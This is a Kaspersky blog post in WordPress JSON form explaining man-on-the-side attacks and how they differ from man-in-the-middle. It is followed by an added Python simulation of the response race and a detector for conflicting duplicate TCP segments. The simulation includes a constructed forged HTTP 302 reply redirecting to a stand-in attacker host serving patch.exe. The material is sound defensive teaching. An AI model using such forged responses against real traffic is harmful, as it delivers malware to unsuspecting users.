{"id":47125,"date":"2023-02-14T06:02:16","date_gmt":"2023-02-14T11:02:16","guid":{"rendered":"https:\/\/www.kaspersky.com\/blog\/?p=47125"},"modified":"2023-03-06T08:04:15","modified_gmt":"2023-03-06T13:04:15","slug":"man-on-the-side","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/man-on-the-side\/47125\/","title":{"rendered":"Man-on-the-side \u2013 peculiar attack"},"content":{"rendered":"<p>There are attacks that everyone\u2019s heard of, like <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/ddos-distributed-denial-of-service-attack\/\" target=\"_blank\" rel=\"noopener\">distributed denial-of-service<\/a> (DDoS) attacks; there are those that mostly only professionals know about, such as <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/man-in-the-middle-attack\/\" target=\"_blank\" rel=\"noopener\">man-in-the-middle<\/a> (MitM) attacks; and then there are the rarer, more exotic ones, like <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/man-on-the-side-mots\/\" target=\"_blank\" rel=\"noopener\">man-on-the-side<\/a> (MotS) attacks. In this post, we talk about the latter in more detail, and discuss how they differ from man-in-the-middle attacks.<\/p>\n<h2>A who-on-the-where attack?!<\/h2>\n<p>So, how does a man-on-the-side attack work? Basically, a client sends a request to a server over a data-transfer channel that the attackers do not control, but can \u201clisten to\u201d. In most cases such a vantage point means <a href=\"https:\/\/www.kaspersky.com\/blog\/windealer-man-on-the-side\/44518\/\" target=\"_blank\" rel=\"noopener nofollow\">access<\/a> to the Internet provider\u2019s hardware, and this is a very rare thing \u2013 and that\u2019s why man-on-the-side attacks are in turn rare. The attackers watch the client\u2019s requests and inject their own malicious responses to them.<\/p>\n<p>A man-in-the-middle attack works in a similar way. 
The attackers also tap into the data exchange between the client and the server. The main difference is that in a man-on-the-side attack the client\u2019s request still reaches its recipient (the server), and the server still answers it. The attackers therefore have to win a race: their forged response must reach the client before the genuine one, because the client accepts the first response that matches its request and discards the duplicate that arrives later.<\/p>\n<p>As for man-in-the-middle, the attackers have a greater level of control over the data-transfer channel. They intercept the request, and can modify, delay or drop data sent by other users on the network. Thus, they have no need to outrun the server\u2019s response.<\/p>\n<p>However, a man-in-the-middle is a much more invasive attack than a man-on-the-side one: the attackers have to sit in the path of the traffic rather than merely alongside it, and that makes them easier to spot. We described in more detail how a man-in-the-middle attack works, based on an example with\u2026 Little Red Riding Hood in <a href=\"https:\/\/www.kaspersky.com\/blog\/fairy-tales-red-hood\/28707\/\" target=\"_blank\" rel=\"noopener nofollow\">this post<\/a>!<\/p>\n<h2>OK, but how does a man-on-the-side attack work?<\/h2>\n<p>A successful man-on-the-side attack makes it possible to send fake responses to various types of requests to the victim\u2019s computer, and in this way to:<\/p>\n<ul>\n<li><strong>Replace a file the user wanted to download<\/strong>. In 2022, for example, APT group LuoYu <a href=\"https:\/\/www.kaspersky.com\/blog\/windealer-man-on-the-side\/44518\/\" target=\"_blank\" rel=\"noopener nofollow\">delivered<\/a> WinDealer malware to devices of victims, most of whom were diplomats, scientists or entrepreneurs in China. The victim\u2019s software sent a request to its server to <a href=\"https:\/\/securelist.com\/windealer-dealing-on-the-side\/105946\/\" target=\"_blank\" rel=\"nofollow noopener\">update<\/a> itself, and the attackers answered first with their own version of the update, complete with malware; <\/li>\n<li><strong>Run a malicious script on the device<\/strong>. 
According to the Electronic Frontier Foundation, <a href=\"https:\/\/www.eff.org\/deeplinks\/2015\/04\/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack\" target=\"_blank\" rel=\"nofollow noopener\">this<\/a> is exactly how in 2015 the Chinese government tried to censor the well-known code-hosting service GitHub. The attackers used man-on-the-side injection to deliver malicious JavaScript to the browsers of unsuspecting users visiting unencrypted websites. As a result, these browsers kept reloading certain GitHub pages over and over again. This DDoS attack lasted more than five days and significantly hampered the service;<\/li>\n<li><strong>Redirect the victim to a malicious website<\/strong> (for example, by forging a DNS reply or an HTTP redirect).<\/li>\n<\/ul>\n<p>On a side note, intelligence agencies in various countries are also <a href=\"https:\/\/securityaffairs.co\/23129\/hacking\/quantumhand-nsa-impersonates-facebook-inject-malware.html\" target=\"_blank\" rel=\"nofollow noopener\">suspected<\/a> of using this type of attack.<\/p>\n<h2>Means of protection<\/h2>\n<p>We\u2019ll repeat once again that man-on-the-side attacks are quite rare. Attackers need a vantage point from which they can observe your traffic: usually the provider\u2019s hardware, but a Wi-Fi network they control or share with you will do just as well. Therefore, business trips, work conferences or any other occasions when your employees connect to questionable Wi-Fi are high-risk situations. 
To stay safe, we recommend always working via a VPN, and using a <a href=\"https:\/\/www.kaspersky.com\/small-to-medium-business-security?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder_______\" target=\"_blank\" rel=\"noopener nofollow\">strong security solution<\/a> on all employee work devices. A VPN helps here because the attackers must see the plaintext request in order to forge a convincing answer to it: an encrypted tunnel hides both the request and the connection details needed to spoof a reply, so there is nothing left to race.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>What is a man-on-the-side attack, and how does it differ from a man-in-the-middle attack?<\/p>\n","protected":false},"author":2684,"featured_media":47110,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3051,2683],"tags":[729,4330,709,174,1866],"class_list":{"0":"post-47125","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-enterprise","9":"category-threats","10":"tag-espionage","11":"tag-man-on-the-side","12":"tag-vpn","13":"tag-wi-fi","14":"tag-wireless-networks"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/man-on-the-side\/47125\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/man-on-the-side\/25194\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/man-on-the-side\/20692\/"},{"hreflang":"en-us","url":"https:\/\/usa.kaspersky.com\/blog\/man-on-the-side\/27854\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/man-on-the-side\/25526\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/man-on-the-side\/25982\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/man-on-the-side\/28434\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/man-on-the-side\/34667\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/man-on-the-side\/20176\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/man-on-the-side\/20807\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/man-on-the-side\/29788\/"},{"hreflang":"ja","url":"https:\/\/blog.kaspersky.co.jp\/man-on-the-side\/33359\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/man-on-the-side\/25854\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/man-on-the-side\/31566\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/man-on-the-side\/31279\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/man-on-the-side\/","name":"man-on-the-side"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2684"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=47125"}],"version-history":[{"count":8,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125\/revisions"}],"predecessor-version":[{"id":47439,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125\/revisions\/47439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/47110"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=47125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=47125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=47125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
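The post above describes the man-on-the-side race (the injector must answer before the real server because the client keeps the first matching response) but does not show what that looks like on the wire or how a defender would notice it. The following is an added example, not code from the Kaspersky post or from any of the campaigns it mentions. It is a deliberately simplified model: each response is a single TCP segment carrying an HTTP reply, the arrival times, TTL values, the server and injector labels and the `attacker.example` host are all constructed sample data, and the detector implements the well-known heuristic that a real server never sends two segments with the same sequence number but different payloads, so a second, conflicting copy is evidence of injection whether or not the attacker won the race.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    """One TCP segment as seen by a sensor next to the client.

    Constructed sample data for the example, not a real capture.
    """
    ts: float       # arrival time at the client, in seconds after the request
    src: str        # who really sent it, as labelled by us for the demo
    ttl: int        # IP TTL on arrival (hop count hint; constructed values)
    seq: int        # sequence number of the first payload byte
    payload: bytes  # HTTP reply carried by the segment


# Constructed replies: what the real update server says, and what the injector says.
LEGIT = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>update manifest</html>"
FORGED = (b"HTTP/1.1 302 Found\r\n"
          b"Location: http://update.attacker.example/patch.exe\r\n\r\n")


def stream(forged_delay: float, legit_delay: float) -> list[Segment]:
    """Both parties answer the same request, so both replies carry the same seq."""
    return [
        Segment(ts=legit_delay, src="server", ttl=52, seq=1, payload=LEGIT),
        Segment(ts=forged_delay, src="injector", ttl=61, seq=1, payload=FORGED),
    ]


def client_reassemble(segments: list[Segment]) -> bytes:
    """Model of a TCP receiver: the first copy of each sequence number wins,
    later copies are treated as retransmissions and dropped. This is the
    property the injector exploits; it only has to be faster, not in the path."""
    first: dict[int, Segment] = {}
    for seg in sorted(segments, key=lambda s: s.ts):
        first.setdefault(seg.seq, seg)
    return b"".join(first[seq].payload for seq in sorted(first))


def detect_injection(segments: list[Segment]) -> list[dict]:
    """Flag every sequence number for which two segments with different
    payloads arrived. A genuine retransmission repeats the same bytes, so a
    conflicting duplicate means someone else answered the same request. The
    client silently drops the loser, but a passive sensor still sees both,
    which is why this works even when the attacker won the race. A TTL
    mismatch between the two copies is reported as a secondary hint that
    they were sent from different places in the network."""
    first: dict[int, Segment] = {}
    alerts: list[dict] = []
    for seg in sorted(segments, key=lambda s: s.ts):
        prev = first.get(seg.seq)
        if prev is None:
            first[seg.seq] = seg
        elif prev.payload != seg.payload:
            alerts.append({
                "seq": seg.seq,
                "winner": prev.src,          # the copy the client acted on
                "loser": seg.src,            # the copy the client dropped
                "ttl_mismatch": prev.ttl != seg.ttl,
            })
    return alerts


if __name__ == "__main__":
    # Injector answers at 40 ms, the real server at 120 ms: the race is won.
    won = stream(forged_delay=0.04, legit_delay=0.12)
    # Injector answers at 150 ms: the race is lost, the client gets the real page.
    lost = stream(forged_delay=0.15, legit_delay=0.12)
    print("race won, client sees :", client_reassemble(won).split(b"\r\n")[0])
    print("race lost, client sees:", client_reassemble(lost).split(b"\r\n")[0])
    print("alerts (won) :", detect_injection(won))
    print("alerts (lost):", detect_injection(lost))
```

Two things the model makes visible: the attacker does not need to block anything, a 302 that arrives 80 ms early is enough to send the client to a different download; and the defender's evidence is the duplicate the client threw away, so the detection has to run on a sensor that sees all segments, not on the client's reassembled stream. Over a VPN the sensor at the ISP would see only the tunnel, and the injector would see neither the request nor the sequence number it needs to forge a reply.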